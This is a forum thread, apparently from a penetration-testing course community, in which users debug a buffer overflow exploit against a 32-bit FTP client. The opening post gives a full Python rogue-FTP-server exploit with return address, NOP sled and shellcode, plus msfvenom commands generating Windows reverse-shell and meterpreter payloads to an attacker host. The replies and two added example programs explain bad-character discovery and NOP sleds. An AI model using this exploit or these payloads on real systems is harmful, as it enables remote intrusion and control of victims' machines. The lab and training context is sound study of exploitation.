32Bit FTP Buffer Overflow attack


Hi All,

I was able to pop calc.exe on 32bit buffer overflow but i cant get a reverse shell. Can anyone help?

msf:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.203.128 LPORT=4444 -f python --var-name payload EXITFUNC=thread -b "\x00"

Python Script:

#!/usr/bin/python3

import socket, sys

# Rogue FTP server: wait for the vulnerable client to connect and answer
# with an oversized 220 banner that overflows the client's receive buffer.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", 21))
sock.listen(1)
print("[+] Listening on FTP port 21")
c, addr = sock.accept()
print("[+] Connection accepted from: %s" % (addr[0]))

buffer = b"A" * 989                  # junk bytes up to the saved return address
buffer += b"\xb9\xc2\xcc\x75"        # address of the jump instruction (little-endian)
buffer += b"\x90" * 32               # NOP sled in front of the shellcode

payload = b""                        # msfvenom -f python output (only the first lines are shown)
payload += b"\xbf\xfa\x6f\x7e\xe9\xd9\xcc\xd9\x74\x24\xf4\x5d"
payload += b"\x2b\xc9\xb1\x52\x83\xed\xfc\x31\x7d\x0e\x03\x87"

buffer += payload

# Everything must be bytes in Python 3, including the banner and the CRLF.
c.send(b"220 " + buffer + b"\r\n")
c.recv(1024)
c.close()
print("[+] Client exploited !! ")
sock.close()

Original post by Clarence


You are using a python version to get a reverse shell… are you sure you can use a python?

I would try something like this:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

Is your listener correct?

Original reply by StefanWAustin


I’m assuming you’ve corrected your buffer and payload, as they are two (duplicate) instances of adding junk bytes, jump command and shellcode (you’ve done the whole thing twice).

This here:

Buffer=…

buffer= …

buffer=…

Payload=…

Payload=…

Payload+=buffer

You just need one line for junk bytes, one for the JMP, and one for shellcode. With each new line use +=, as this adds onto the end of the string.

Payload += 7

is the equivalent of

Payload = payload + 7

================================

Also, the msfvenom payload should just be shellcode, not an executable output… also assuming you’ve got that straightened out because you mentioned you’ve got calc.exe running; however, I’ll put this up anyway.

That’s just msfvenom -p windows/shell_reverse_tcp LHOST=… LPORT=… -f c -b "\x00"

-f c is to generate shellcode in C

-f exe is to format as exe

-b "\x00" is to identify bad characters; \x00 by default is no good. You may need to add more. If I recall correctly, what you do is google bad characters pypi.org and copy their list of badchars, and add these to your junk bytes. Review the stack to look for any missing numbers/letters in the sequence of 0-9 and A-Z that will be written to the stack as a result of a buffer overflow.

I.e. identify a missing number/letter and append it to the badchars command, i.e. "\x00\xAF" etc.

Original reply by m1ck3yb33
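The reply above describes the bad-character check as "send the full byte sequence, look at the stack, find what is missing". The following is an added example (not code from the thread) that carries that comparison out in Python. The target is a constructed stand-in, simulate_target, that truncates at NUL and drops \x0a and \x0d; in a real exercise the bytes read back from the debugger take its place. The helper names are assumptions of this example.

```python
# Added example (not from the thread): the bad-character comparison step,
# run against a constructed stand-in for the target instead of a debugger dump.

def all_chars(excluded=(0x00,)):
    """Return the 0x01..0xff test sequence with known-bad bytes removed.
    0x00 is excluded by default because it terminates C strings."""
    return bytes(b for b in range(0x00, 0x100) if b not in excluded)

def first_mismatch(sent, observed):
    """Compare what was sent with what landed on the stack.
    Returns the first byte that was altered or lost, or None if they agree.
    A truncated dump counts as a mismatch at the first missing byte."""
    for i, expected in enumerate(sent):
        if i >= len(observed) or observed[i] != expected:
            return expected
    return None

def simulate_target(data):
    """Constructed stand-in for the vulnerable program's input handling:
    it truncates at the first NUL and drops line-feed and carriage-return
    bytes, as a text-oriented FTP parser might. A real run replaces this
    with the bytes copied out of the debugger's stack view."""
    data = data.split(b"\x00", 1)[0]
    return bytes(b for b in data if b not in (0x0a, 0x0d))

def discover_bad_chars(target, known_bad=(0x00,)):
    """Repeat send / compare / exclude until the dump matches exactly.
    Only one bad byte is learned per round, because a single dropped or
    altered byte shifts or truncates everything that follows it."""
    bad = set(known_bad)
    while True:
        probe = all_chars(bad)
        culprit = first_mismatch(probe, target(probe))
        if culprit is None:
            return sorted(bad)
        bad.add(culprit)

def badchars_flag(bad):
    """Render the list in the form msfvenom's -b option expects."""
    return '"' + "".join("\\x%02x" % b for b in bad) + '"'

if __name__ == "__main__":
    found = discover_bad_chars(simulate_target)
    print("bad characters:", badchars_flag(found))
```

The loop deliberately stops at the first mismatch each round rather than collecting every differing byte: once one byte is dropped, every later byte is shifted by one and would be reported as bad too. Removing one culprit per round and re-sending is the same procedure the reply describes, just without eyeballing the hex.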


hey mate,

I had the same problem. I followed this post and things cleared up:

https://community.ine.com/t/32bitftp-bad-chars/374/3

also add a NOP sled to the start of your shellcode:

"\x90\x90\x90\x90\x90\x90\x90\x90"

Original reply by m1ck3yb33


Hi All

Why do we need to add the NOP ?

Why can't it execute our shellcode directly without adding a NOP?

Original reply by luisqp66


The reason the attacker uses the NOP sled is to make the target address bigger: the code can jump anywhere in the sled, instead of exactly at the beginning of the injected code.

So you don’t need to add it always, but if you think your code should work, adding a few NOPs just to be sure is the least you can do.

Original reply by jahoda.radek
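To make the "bigger target" point concrete, here is an added example (not from the thread) that models the overflow layout from the original script and counts how many landing offsets still reach the shellcode with and without a 32-byte sled. Nothing is executed: the model only applies the rule that 0x90 does nothing and control falls through to the next byte. The jump address is the one from the original post; the shellcode is a constructed placeholder of int3 bytes, and the function names are assumptions of this example.

```python
# Added example (not from the thread): a small model of why a NOP sled widens
# the set of return addresses that still arrive at the shellcode.

NOP = 0x90

def build_frame(junk_len, jump_addr, sled_len, shellcode):
    """Lay the overflow string out the way the original post does:
    junk bytes, the 4-byte jump address, the NOP sled, then shellcode."""
    return b"A" * junk_len + jump_addr + bytes([NOP]) * sled_len + shellcode

def sled_entry_points(frame, shellcode_start):
    """Offsets in the frame from which 'execution' slides over NOPs and
    arrives exactly at the first shellcode byte. Landing in the junk or
    past the shellcode start never qualifies, sled or no sled."""
    good = []
    for entry in range(len(frame)):
        pos = entry
        while pos < shellcode_start and frame[pos] == NOP:
            pos += 1
        if pos == shellcode_start:
            good.append(entry)
    return good

def compare_layouts(junk_len=989, jump_addr=b"\xb9\xc2\xcc\x75",
                    shellcode=b"\xcc" * 8):
    """Usable entry points for the same frame with no sled and with a
    32-byte sled, keyed by sled length. The shellcode here is a constructed
    placeholder (int3 bytes), not real payload."""
    results = {}
    for sled_len in (0, 32):
        frame = build_frame(junk_len, jump_addr, sled_len, shellcode)
        start = junk_len + len(jump_addr) + sled_len
        results[sled_len] = len(sled_entry_points(frame, start))
    return results

if __name__ == "__main__":
    for sled_len, count in compare_layouts().items():
        print("sled of %2d bytes: %2d working entry offsets" % (sled_len, count))
```

Without a sled exactly one offset works, the shellcode start itself; with 32 NOPs in front, 33 offsets do, which is the tolerance the reply is describing. The model also shows the limit of the trick: landing before the sled, inside the junk bytes, is still a miss, so the sled only helps when the landing address is slightly off in the direction of the sled.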